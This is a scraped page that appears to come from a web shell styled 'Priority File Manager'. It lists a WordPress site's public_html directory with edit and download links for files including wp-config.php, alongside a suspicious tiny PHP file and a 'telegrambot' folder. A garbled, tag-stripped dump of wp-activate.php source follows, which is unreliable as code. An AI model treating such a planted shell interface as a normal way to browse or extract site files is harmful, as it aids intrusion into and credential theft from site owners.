Priority File Manager

📁 public_html
Base Directory:
/home/ecedu/public_html
NameTypeSizeActions
📄 .htaccess File 1580
Edit Download
📁 .well-known Folder -
📄 .well-known.zip File 15555571
Edit Download
📄 .wp-toolkit-ignore File 217
Edit Download
📁 cce Folder -
📄 error_log File 92448
Edit Download
📄 index.php File 405
Edit Download
📄 license.txt File 19903
Edit Download
📁 new Folder -
📄 rZ2i4m.php File 27
Edit Download
📄 readme.html File 7425
Edit Download
📁 telegrambot Folder -
📄 wp-activate.php File 7387
Edit Download
📁 wp-admin Folder -
📄 wp-blog-header.php File 351
Edit Download
📄 wp-comments-post.php File 2323
Edit Download
📄 wp-config-sample.php File 3336
Edit Download
📄 wp-config.php File 3758
Edit Download
📁 wp-content Folder -
📄 wp-cron.php File 5617
Edit Download
📁 wp-includes Folder -
📄 wp-links-opml.php File 2502
Edit Download
📄 wp-load.php File 3937
Edit Download
📄 wp-login.php File 51414
Edit Download
📄 wp-mail.php File 8727
Edit Download
📄 wp-settings.php File 30081
Edit Download
📄 wp-signup.php File 34516
Edit Download
📄 wp-trackback.php File 5102
Edit Download
📄 wpt-hotlinked-image-stub.png File 12890
Edit Download
📄 xmlrpc.php File 3205
Edit Download
get_error_code() ) ) { status_header( 404 ); } elseif ( is_wp_error( $result ) ) { $error_code = $result->get_error_code(); if ( ! in_array( $error_code, $valid_error_codes, true ) ) { status_header( 400 ); } } nocache_headers(); if ( is_object( $wp_object_cache ) ) { $wp_object_cache->cache_enabled = false; } // Fix for page title. $wp_query->is_404 = false; /** * Fires before the Site Activation page is loaded. * * @since 3.0.0 */ do_action( 'activate_header' ); /** * Adds an action hook specific to this page. * * Fires on {@see 'wp_head'}. * * @since MU (3.0.0) */ function do_activate_header() { /** * Fires within the `` section of the Site Activation page. * * Fires on the {@see 'wp_head'} action. * * @since 3.0.0 */ do_action( 'activate_wp_head' ); } add_action( 'wp_head', 'do_activate_header' ); /** * Loads styles specific to this page. * * @since MU (3.0.0) */ function wpmu_activate_stylesheet() { ?>


get_error_code(), $valid_error_codes, true ) ) { $signup = $result->get_error_data(); ?>

'; if ( '' === $signup->domain . $signup->path ) { printf( /* translators: 1: Login URL, 2: Username, 3: User email address, 4: Lost password URL. */ __( 'Your account has been activated. You may now log in to the site using your chosen username of “%2$s”. Please check your email inbox at %3$s for your password and login instructions. If you do not receive an email, please check your junk or spam folder. If you still do not receive an email within an hour, you can reset your password.' ), esc_url( network_site_url( $blog_details->path . 'wp-login.php', 'login' ) ), esc_html( $signup->user_login ), esc_html( $signup->user_email ), esc_url( wp_lostpassword_url() ) ); } else { printf( /* translators: 1: Site URL, 2: Username, 3: User email address, 4: Lost password URL. */ __( 'Your site at %1$s is active. You may now log in to your site using your chosen username of “%2$s”. Please check your email inbox at %3$s for your password and login instructions. If you do not receive an email, please check your junk or spam folder. If you still do not receive an email within an hour, you can reset your password.' ), sprintf( '%1$s', esc_url( $signup->domain . $blog_details->path ) ), esc_html( $signup->user_login ), esc_html( $signup->user_email ), esc_url( wp_lostpassword_url() ) ); } echo '

'; } elseif ( null === $result || is_wp_error( $result ) ) { ?>

get_error_message() ); ?>

user_login ); ?>

View your site or Log in' ), esc_url( $url ), esc_url( $login_url ) ); ?>

Log in or go back to the homepage.' ), esc_url( network_site_url( $blog_details->path . 'wp-login.php', 'login' ) ), esc_url( network_home_url( $blog_details->path ) ) ); ?>